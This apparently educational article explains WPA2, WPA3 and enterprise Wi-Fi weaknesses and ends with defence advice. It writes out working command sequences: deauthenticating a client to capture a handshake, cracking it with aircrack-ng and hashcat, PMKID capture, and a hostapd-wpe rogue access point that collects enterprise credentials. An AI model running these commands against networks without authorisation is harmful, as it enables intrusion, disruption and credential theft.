Wireless security has evolved significantly over the past decade, but the attacks that work in 2026 are often the same ones that worked in 2016 — because the infrastructure hasn’t kept up with the protocols. Understanding what’s actually being exploited versus what the spec says should be secure is the useful frame.
The Protocol Stack
WEP is dead. It was broken in 2001 and can be cracked in under a minute with commodity hardware. If you’re still running WEP on anything, stop.
WPA2-Personal (PSK) remains the most common home and small business configuration. The attack surface:
- The 4-way handshake captured during authentication can be taken offline and cracked against a wordlist
- PMKID attacks allow capturing crackable material without waiting for a client to connect
- Default router passwords are often weak and well-documented
WPA2-Enterprise uses 802.1X authentication with a RADIUS server. Individual users authenticate with credentials rather than a shared key. Significantly harder to attack directly — the main vectors are rogue AP attacks (setting up a fake AP that accepts connections and captures credentials) and weak EAP configurations.
WPA3 introduced Simultaneous Authentication of Equals (SAE), which replaces the PSK handshake and resists offline dictionary attacks. Side-channel attacks against early SAE implementations existed but have since been patched. WPA3 is genuinely more secure, but transition mode (supporting both WPA2 and WPA3 clients) reintroduces some WPA2 vulnerabilities. Full WPA3-only networks are more defensible.
The Practical Attack Landscape
WPA2 Handshake Capture and Crack
The most common attack against WPA2 personal networks:
# Put interface in monitor mode
airmon-ng start wlan0
# Survey nearby networks, then lock onto the target BSSID and channel and write a capture file
airodump-ng wlan0mon
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauthenticate one client so it re-associates and the 4-way handshake lands in the capture
aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c CLIENT_MAC wlan0mon
# Crack with aircrack-ng directly, or convert to hashcat mode 22000 for GPU cracking
aircrack-ng capture-01.cap -w rockyou.txt
hcxpcapngtool -o hash.hc22000 capture-01.cap
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt
The crack succeeds based entirely on whether the PSK is in the wordlist. A strong random passphrase — 20+ characters — is not crackable with dictionary attacks even on fast hardware.
PMKID Attack
Doesn’t require a connected client — you can capture crackable material just from the access point:
# hcxdumptool captures PMKID without waiting for handshake
hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
hcxpcapngtool -o hash.hc22000 capture.pcapng
hashcat -a 0 -m 22000 hash.hc22000 rockyou.txt
Evil Twin / Rogue AP
A rogue access point with the same SSID as a legitimate network. When clients connect — either automatically or because the attacker deauthenticates them from the real AP — they send credentials or traffic to the attacker.
Against WPA2-Enterprise, this attack can capture EAP credentials (usernames and NTLMv2 hashes) if the client isn’t configured to verify the server certificate. Hostapd-wpe automates this:
# Rogue AP that captures WPA2-Enterprise credentials
hostapd-wpe hostapd-wpe.conf
The captured NTLMv2 hashes can then be cracked offline or relayed.
Defense
For home/personal:
- Use WPA3 if your hardware supports it
- Set a strong random PSK — 20+ random characters, not a passphrase you’ll remember
- Disable WPS entirely (WPS PIN attacks remain viable)
- Segment IoT devices onto a guest network
For enterprise:
- WPA2/WPA3-Enterprise with certificate validation enforced on clients
- RADIUS server that logs authentication attempts
- Rogue AP detection (wireless IDS)
- Client certificates rather than username/password for EAP where possible
The persistent problem: Most people’s routers still have default or weak PSKs. The ISP-provided router with the password on a sticker is more vulnerable than the protocol implies, because that sticker password is often predictable.